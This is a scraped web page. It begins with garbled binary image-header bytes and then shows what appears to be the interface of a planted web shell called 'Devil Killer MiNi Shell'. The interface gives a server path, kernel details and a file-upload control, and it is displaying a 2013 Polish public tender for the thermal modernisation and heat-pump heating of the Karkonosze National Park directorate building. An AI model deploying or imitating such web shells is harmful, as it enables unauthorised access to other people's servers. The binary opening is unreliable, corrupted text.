JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130211/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130211/55530-N-2013.html

<p class="kh_header"><b>Jelenia Góra: Termomodernizacja oraz zmiana systemu ogrzewania budynku Dyrekcji Karkonoskiego Parku Narodowego z siedzibą w Jeleniej Górze, realizowanego w ramach projektu dofinansowanego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej pn: Ograniczenie szkodliwych emisji oddziaływających bezpośrednio na ekosystemy Karkonoskiego Parku Narodowego oraz zmianę systemu ogrzewania budynku Dyrekcji KPN: - roboty budowlane zaprojektuj i wybuduj.</b><br>
<b>Numer ogłoszenia: 55530 - 2013; data zamieszczenia: 11.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Karkonoski Park Narodowy z siedzibą w Jeleniej Górze , ul. Chałubińskiego 23, 58-570 Jelenia Góra, woj. dolnośląskie, tel. 75 7553726, faks 75 7553348.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpnmab.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka sektora finansów publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja oraz zmiana systemu ogrzewania budynku Dyrekcji Karkonoskiego Parku Narodowego z siedzibą w Jeleniej Górze, realizowanego w ramach projektu dofinansowanego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej pn: Ograniczenie szkodliwych emisji oddziaływających bezpośrednio na ekosystemy Karkonoskiego Parku Narodowego oraz zmianę systemu ogrzewania budynku Dyrekcji KPN: - roboty budowlane zaprojektuj i wybuduj..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. opracowanie dokumentacji projektowej: 1. FUNDAMENT 1. Izolacja pionowa przeciwwilgociowa fundamentu w części podpiwniczonej od strony północnej wschodniej i zachodniej budynku w ramach czego należy wykonać: a) Wykopy ciągłe lub jamiste ze skarpami z ułożeniem urobku na odkład, b) Przygotować stare podłoże fundamentu pod wykonanie izolacji poprzez: -oczyszczenie mechaniczne i zmycie, uzupełnienie bruzd i kawern i wypełnienie spoin w murze kamiennym, c) Izolacje pionowe murów, środkiem typu Dysperbit 3-warstwowe, d) Zabezpieczenie ścian folią kubełkową e) Zasypanie podsypką filtracyjna wykopu kruszywem 10-30mm f) Przemurowanie słupa ceglanego podtrzymującego werandę od str. pn-zach. 2. ŚCIANA ZEWNĘTRZNA - Powierzchnia ocieplana styropianem pod deski elewacyjne wynosi 276,07m2 ,natomiast powierzchnia ocieplenia styropianem pod wyprawę tynkarską wynosi 443,68m2 Termomodernizacja ścian zewnętrznych od zewnątrz przewiduje wykonanie: a) Rozbiórki elewacyjnych listew boazeryjnych, b) Demontaż krat stalowych okiennych i drzwiowych c) Demontaż do ponownego użytku ościeżnic drewnianych okiennych i drzwiowych, d) Demontaż i ponowny montaż oświetlenia zewnętrznego, instalacji alarmowej i zabezpieczeń budynku oraz akcesoriów zamontowanych na elewacji , e) Przygotowanie poprzez impregnowanie środkami grzybobójczymi i ogniochronnymi zdemontowanej zewnętrznej boazerii ściennej i konstrukcji drewnianej typu krawędziaki, bale, listwy i deski z boazerii, formy rzeźbione i innych elementów wystroju elewacji, f) Częściowa wymiana odeskowania ścian, z istniejących desek profilowanych oraz wykonanie rusztu drewnianego na ścianach (z wykorzystaniem istniejącego rusztu) wraz z impregnacją przeciwgrzybiczną i ognioochronną drewna. Następnie zamocowania folii paroprzepuszczalnej montaż ocieplenia z płyt styropianowych oraz montaż elewacyjnych listew boazeryjnych wcześniej zdemontowanych, g) W razie konieczności częściowa wymiana lub przedłużenie konstrukcyjnych elementów drewnianych, typu: końcówki belek stropowych , krokwie i inne, h) Czyszczenie i lakierowanie zabezpieczające 2-krotnie wszystkich elementów deskowania i wystroju elewacji w tym form rzeźbionych i stalowych. i) Dorabianie elementów skrzydeł okiennych do istniejących ościeżnic, połączenia, elementów: narożna, szczebliny, szprosy w już istniejących oknach nie przeznaczonych do wymiany, j) Ocieplenie płytami styropianowymi metodą lekko-mokrą w systemie Stopter wraz z przygotowaniem podłoża i ręczne wykonanie wyprawy elewacyjnej cienkowarstwowej, ścian otynkowanych z cegły, wykonanie gzymsów, boni, ryzalitów, wykonanie elewacji z tynku mineralnego na ścianach murowanych ocieplonych płytami styropianowymi zachowując kamienno-ceglaną elewację partii cokołu, ryzalitów i snycerki, k) Demontaż rur spustowych przeznaczonych do ponownego montażu, l) Naprawa różnych elementów metalowych (wymiana lub uzupełnienie, elementów, ślusarsko-kowalskich), kraty średnio ozdobne, m) Demontaż i montaż okien i drzwi, okna rozwieralne i uchylno-rozwierane, osadzanie na kotwach demontaż i montaż 24 sztuk okien w tym 11sztuk okien dachowych i 1 sztuki drzwi zewnętrznych o łącznej powierzchni 43,84m2, n) Przygotowanie podłoża pod montaż płyt styropianowych, ściany otynkowane z cegły. Uzupełnienie tynków zewnętrznych zwykłych kategorii III (ściany, loggie, balkony), podłoże: cegła, pustaki ceramiczne, o) Remont i wymiana elementów ślusarsko - kowalskich wymiana krat i akcesoria, elewacyjnych w tym kratek wentylacyjnych. Przebudowa pokrycia dachowego z blachy stalowej przy wejściu do kotłowni poprzez zwiększenie kąta spadku. p) Wykonanie parapetów i podokienników z zachowaniem odpowiednich spadków, r) Malowanie farbami zewnętrznymi elewacyjnymi stolarki, ciesielki, szczytów, ganku, werand, balkonów, deskowania elewacji, opaski okienne, tynku żywicznego na styropianie itp. nowych jak i istniejących uprzednio pomalowanych. 3. Ściany wewnętrzne - 179,91 m2 a) Ocieplenie od wewnątrz muru kamiennego i ceglanego z wykorzystaniem technologii (np. do bloczków Ytong Multipor) z wyprawą tynkową i malowaniem wewnętrznym . W ścianach docieplanych od wewnątrz należy wykonać wentylację grawitacyjną z podłączeniem do nieużywanego komina biegnącego od piwnicy na strych z wyprowadzeniem nad dach. W pozostałych pomieszczeniach ocieplone ściany należy wentylować kratkami nawiewu i wywiewu, b) Docieplenie drewnianej ścianki werandy I p wełną mineralną na ruszcie z wykończeniem płytami GK, szpachlowaniem i malowaniem. 4. Termomodernizacja dachu - 450,5m2 4.1. Roboty pomocnicze i rozbiórki a) Rozebranie pokrycia dachowego z blachy, blacha nie nadająca się do użytku , b) Rozebranie rynien i rur spustowych, blacha nadająca się do użytku, do ponownego montażu, c)Rozebranie akcesorii dachowych, anten, sztyc nie przeznaczonych do ponownego montażu, d) Rozebranie akcesorii dachowych, anten, e) Demontaż obróbek z blachy, f) Demontaż okien połaciowych. 4.2. Ołacenie połaci dachowych z tarcicy nasyconej a) wymiana w ok. 10% uszkodzonego deskowania połaci dachowych , końcówek krokwi przy okapach i jednostkowego wzmocnienia krokwi dachowych, b) ułożenie izolacji na połaciach dachowych, c) Ołacenie połaci dachowych z tarcicy nasyconej, łaty i kontr łaty, d) Izolacje termiczne wykonywane płytami w systemie ECOTHERM - PIR ,wentylowany na dachu z wszystkimi obróbkami technologicznymi włącznie. e) Obróbki blacharskie, blacha z cynku , kosze, f) Okna i włazy dachowe fabrycznie wykończone, okna poddaszy połaciowe. 4.3. Pokrycia dachowe z dachówki a) Ułożenie dachówki karpiówki podwójnie w koronkę, gąsior typu A, b) Uzupełnienie ław kominiarskich, ławy poziome oraz uzupełnienie elementów wyposażenia dachów, włazy kominiarskie itp. c) Wymiana deskowania dachów, deski czołowe (wiatrownice), d) Montaż prefabrykowanych różnych obróbek i elementów z blachy z cynku, obrobienie podpórek, słupów, masztów, uchwytów i odgromników w dachach krytych blacha, e) Montaż prefabrykowanych różnych obróbek i elementów z blachy z cynku, krawędzie balkonów i loggii, f) Montaż rynien dachowych z blachy ocynkowanej, rynny półokrągłe z demontażu g) Montaż prefabrykowanych rur spustowych z blachy ocynkowanej, rury okrągłe z rozbiórki, h) Dwuwarstwowe, renowacyjne krycie dachów papą termozgrzewalną z drobną naprawą istniejącego pokrycia, grubości 9,1 mm, gwarancja 40 lat. i) remont pokrycia z blachy przy wejściu do kotłowni a polegający na zwiększeniu kąta spadku do wysokości parapetu okna znajdującego się nad wejściem. 4.4. Instalacja odgromowa a) Montaż zwodów poziomych nie naprężanych z pręta o średnicy 10mm, pokrycie dachówka, b) Montaż w instalacji uziemiającej lub odgromowej, złącze kontrolne, połączenie drut-płaskownik, c) Montaż w instalacji uziemiającej lub odgromowej, złącze do rynny okapowej, na dachu, d) Badania i pomiary instalacji, instalacja odgromowa. ZMIANA SYSTEMU OGRZEWANIA 5. Zmiana systemu ogrzewania Wstępnie szacuje się stworzenie jednego wspólnego układu obejmującego swym działaniem cały obiekt z zachowaniem jednorodności materiałowej, właściwych prędkości przepływu i zapewnienia nowych nominalnych przepływów przy nowych parametrach pracy. 5.1. Modernizacja istniejącej instalacji wewnętrznej powinna obejmować: - wymianę istniejących grzejników oraz armatury około grzejnikowej, (zawór powrotny lub komplet podłączeniowy, głowica termostatyczna). Zalecane parametry zasilania instalacji max. 65 C i zalecana różnica temperatur do 10 K. - demontaż grzejników - demontaż instalacji centralnego ogrzewania - przebicia w stropach i ścianach - montaż nowej instalacji c.o. (pionów, podejść do grzejników itp.) - montaż grzejników wraz z osprzętem (nowych oraz przeznaczonych do ponownego montażu) - izolacje cieplne i konieczne zabudowy rur instalacji c.o. płytami GK, gipsowanie i malowanie całych ścian w miejscach przebiegu instalacji c.o. - montaż mieszalników pompy ciepła i wspomagania ogrzewania przez kocioł c.o. na gaz. 5.2. W zakresie zamówienia jest również wykonanie zasilania elektrycznego: pompy ciepła i wszystkich urządzeń elektrycznych pomocniczych w tym urządzeń i automatyki do współpracy dwóch źródeł ciepła. Na zakres prac elektrycznych składa się też wykonanie szafy zasilająco-sterowniczej z wymaganymi zabezpieczeniami oraz wykonanie okablowania i konfiguracji układu automatyki. Zakres zamówienia obejmuje również wykonanie wszelkich niezbędnych prac budowlano konstrukcyjnych towarzyszących planowanej inwestycji tj. przebić, wykonania fundamentów pod urządzenia, bruzd, otworów montażowych itp. wraz z przywróceniem miejsc montażowych do stanu pierwotnego. 6. Pompa ciepła 6.1. Dolne źródło zasilania - wykonanie koniecznych prac geologicznych , - roboty ziemne, wyznaczenie miejsc na wykonanie 8 odwiertów na głębokość 80 m, wykopy pod ułożenie instalacji do budynku, przebicia fundamentu, - montaż sond U, ułożenie i montaż instalacji w wykopie od sond do pompy - przejścia i uszczelnienia instalacji przez mury, izolacje cieplne, przywrócenie poprzedniego stanu murów i tynków - zasypywanie wykopów, niwelacja terenu 6.2. Planowana lokalizacja pompy ciepła wraz z osprzętem: przewidziana jest w istniejącym pomieszczeniu w kotłowni. Układ technologiczny pompy ciepła powinien obejmować pompę ciepła której poszczególne elementy zostały wyspecyfikowane przez producenta wraz z niezbędnym osprzętem i elementami zabezpieczającymi a w szczególności: - filtry - zawory bezpieczeństwa, - naczynia kompensujące po stronie pierwotnej i wtórnej - bufor wody grzewczej o pojemności zgodnej z wytycznymi producenta p.c. (gwarantując jej stabilną pracę) - pompy obiegowe dolnego źródła i strony instalacyjnej - układy regulacji temperatury zasilania instalacji w zależności od temperatury zewnętrznej (regulacja pogodowa z mieszaczem) - układ sterowania i automatyki z szafą zasilająco - zabezpieczającą. 7. Roboty remontowe pomocnicze Projekt wykonania prac winien zawierać dodatkowo inne konieczne a nie wymienione prace pomocnicze wynikające z technologii wykonania . Kwota przeznaczona na realizację przedmiotu zamówienia wynosi 707000,00 brutto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.32.00.00-7, 45.00.00.00-7, 45.40.00.00-1, 45.32.00.00-6, 45.33.11.00-7, 45.31.00.00-3, 45.26.10.00-4, 45.26.12.11-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5500,00 słownie : pięć tysięcy pięćset</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga specjalnych uprawnień. Zamawiający nie wyznacza szczególnego warunku w tym zakresie .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył realizację, co najmniej jednego zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot niniejszego zamówienia tj. wykonał roboty budowlane polegające na termomodernizacji budynku - o wartości nie mniejszej niż 500000 zł brutto oraz potwierdzi dokumentem, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone sposób oceny na podstawie złożonych dokumentów wg zasady spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie co najmniej - wiertnicą, koparko-ładowarką, dźwigiem, rusztowaniami sposób oceny na podstawie złożonych dokumentów wg zasady spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że dysponuje osobami, które muszą posiadać uprawnienia -uprawnienia budowlane w specjalności architektonicznej lub konstrukcyjno - budowlanej do projektowania, uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do projektowania, uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do projektowania, kierownik budowy w specjalności konstrukcyjno - budowlanej, - pracownika z uprawnieniami dozoru instalacji elektrycznych sposób oceny na podstawie złożonych dokumentów wg zasady spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę 300000 zł brutto. b)Posiadają środki finansowe lub zdolność kredytową w wysokości 500000 zł sposób oceny na podstawie złożonych dokumentów wg zasady spełnia nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
